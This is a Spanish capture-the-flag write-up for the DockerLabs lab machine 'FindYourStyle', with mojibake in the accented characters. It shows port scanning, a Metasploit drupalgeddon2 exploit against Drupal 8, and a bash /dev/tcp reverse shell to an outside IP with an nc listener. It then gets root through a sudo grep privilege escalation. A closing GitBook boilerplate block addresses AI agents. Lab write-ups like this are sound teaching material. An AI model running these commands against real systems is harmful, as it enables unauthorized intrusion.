> For the complete documentation index, see [llms.txt](https://beafn28.gitbook.io/beafn28/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://beafn28.gitbook.io/beafn28/writeups/dockerlabs/findyourstyle.md). # FindYourStyle ### 馃攳 RECONOCIMIENTO En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando: ```bash ping -c 1 172.17.0.2 ``` para verificar la conectividad de red.
A continuaci贸n, realizamos el comando: ```bash nmap -sVC -p- -n --min-rate 5000 172.17.0.2 ``` para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Como podemos observar durante el escaneo que el **puerto 80** perteneciente al **servicio HTTP** est谩 abierto por lo que a continuaci贸n se indagar谩 m谩s. ### 馃攷 EXPLORACI脫N Se utiliza el comando: ```bash sudo nmap -sCV -p80 -v 172.17.0.2 ``` para que nos proporcione m谩s informaci贸n sobre esos puertos espec铆ficamente.
Seguimos indagando m谩s sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingres贸 la **direcci贸n IP** en el navegador lo que llev贸 a que la p谩gina web que est谩 alojada a trav茅s de un **Drupal 8**.
### 馃殌 **EXPLOTACI脫N** Esta versi贸n contiene varios exploits pero voy a explotar uno concretamente con **Metasploit**. ```bash msfconsole search drupal 8 use exploit/unix/webapp/drupal_drupalgeddon2 show options set RHOSTS 172.17.0.2 exploit ```
En meterpreter. 
shell 
bash -i
find / -name settings.php 2>/dev/null
Nos mandamos una Reverse Shell. ```bash /bin/bash -i >& /dev/tcp/192.168.255.136/443 0>&1 ``` Nos ponemos en escucha. ```bash nc -lvnp 443 ```
Hacemos el [tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/#) para trabajar m谩s c贸modos. ### 馃攼 **PRIVILEGIOS** Al estar dentro y ejecutar: ```bash whoami ``` a煤n no somos **root**, por lo que hacemos: ```bash sudo -l ``` para ver si hay algo para explotar. No tenemos permisos **SUDO**. Nos logueamos con el usuario **ballenita** que hemos encontrado.
Nos llama la atenci贸n **grep** por lo que buscamos en esta [p谩gina ](https://gtfobins.github.io/gtfobins/grep/#sudo)c贸mo explotarlo. Vamos a leer si hay en el directorio de `/root`. ```bash sudo -u root /bin/ls /root/ sudo grep '' /root/secretitomaximo.txt ```
Nos convertirnos en **root** con esas credenciales.
--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://beafn28.gitbook.io/beafn28/writeups/dockerlabs/findyourstyle.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.